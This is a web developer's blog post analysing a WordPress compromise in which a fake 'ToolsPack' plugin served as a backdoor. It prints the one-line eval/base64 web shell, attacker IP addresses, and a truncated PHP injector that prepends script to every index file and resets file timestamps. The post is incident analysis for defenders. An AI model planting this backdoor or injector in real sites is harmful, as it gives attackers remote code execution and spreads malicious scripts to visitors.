Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Translation_Entry has a deprecated constructor in /home/sheltonr/public_html/wp-includes/pomo/entry.php on line 14

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; POMO_Reader has a deprecated constructor in /home/sheltonr/public_html/wp-includes/pomo/streams.php on line 12

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; POMO_FileReader has a deprecated constructor in /home/sheltonr/public_html/wp-includes/pomo/streams.php on line 120

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; POMO_StringReader has a deprecated constructor in /home/sheltonr/public_html/wp-includes/pomo/streams.php on line 175

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; POMO_CachedFileReader has a deprecated constructor in /home/sheltonr/public_html/wp-includes/pomo/streams.php on line 221

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; POMO_CachedIntFileReader has a deprecated constructor in /home/sheltonr/public_html/wp-includes/pomo/streams.php on line 236

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; WP_Widget_Factory has a deprecated constructor in /home/sheltonr/public_html/wp-includes/widgets.php on line 544
How do WordPress sites get ToolsPack malware? - Software, Website Design, Cordova/Memphis TN

How do WordPress sites get ToolsPack malware?

ToolsPack plugin is bad stuff…

 

Symptoms:

Your index.php file(s) get JavaScript with something like this at the top:

<script>if(window.document)aa=new RegExp('test','i').toString();aaa='/...

Then, after cleaning, it returns. Plus you get BlackListed by Google.

How does your index.php file get overwritten? Then, if you fix, how does the same file get replaced again? It is maddening.

Anyway – I don’t know where my client picked it up, but sitting there in the plugins directory, all pretty and capitalized, was

plugins/ToolsPack/

with one small file: toolspack.php containing this (oh man) :

$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;

Hmmm…

Checking the log files for several day periods showed several different IP addresses hitting that toolspack.php:

83.69.224.223
87.118.108.202
78.29.15.137

Seems the hackers are interested only in the base index.php and the wp-admin/index.php

Actually, you will see later in the code, the hackers are editing every index.php from the root path on down.

Hmmm…

Get rid of it? …Delete it? …Ha! NO! Let’s have some fun.

Besides, I still don’t know what other files and things they have … Lets see what it does. So I edited their ToolsPack: defanged it and logged their owned stuff:

I logged the Date/Time IP Address and Payload:

February 20, 2012, 3:19 pm - 87.118.108.202 -  - ZXJyb3JfcmVwb3J0aW5nK... Long Block of junk --
why base64 hide it?

Base 64 Decoding shows how they can overwrite the file:

First, get the starting root directory and save the payload in a variable named $iframe…

Full Source truncated … you get the idea… BTW (Nice indenting, for a virus…)

1) Get the starting root directory and save the payload in a variable named $iframe…

2) Then loop through all directories and search for a file named like “index.”

3) Read the file contents, and blank out any <script> content:

4) Now insert the payload from above at the top and put the file back…

5) Finally, cover the tracks by reverting the file time to the original… really evil

 

error_reporting(0);
$dirs[]    = $dir    = "$_SERVER[DOCUMENT_ROOT]";
$iframe    = "<script>if(window.document)aa=/s/g.exec(\"s\").index+[];aaa='0'...

   if ( eregi("^index\.", $file) )
      {
        //
       $file_content    = file_get_contents("$key/$file");
       //  
       $file_content    = preg_replace("/^<script>(.*)<\/script>/iU", "", $file_content);

       //
       $fp         = fopen("$key/$file", "wb");
       if (fwrite($fp, $iframe.$file_content))
               $success += 1;
                fclose($fp);

                touch("$key/$file", $old_time);
                }

Proactive technologist.

Posted in Wordpress

One Response to "How do WordPress sites get ToolsPack malware?"


    Warning: call_user_func() expects parameter 1 to be a valid callback, function 'st_comments' not found or invalid function name in /home/sheltonr/public_html/wp-includes/comment-template.php on line 1810

What do you think?